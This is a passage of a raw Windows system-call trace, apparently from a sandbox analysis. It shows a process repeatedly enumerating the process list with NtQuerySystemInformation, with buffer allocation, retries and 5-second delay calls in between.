ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.881] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.929] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0228.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0228.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0228.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0228.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0228.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0228.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0228.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.028] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 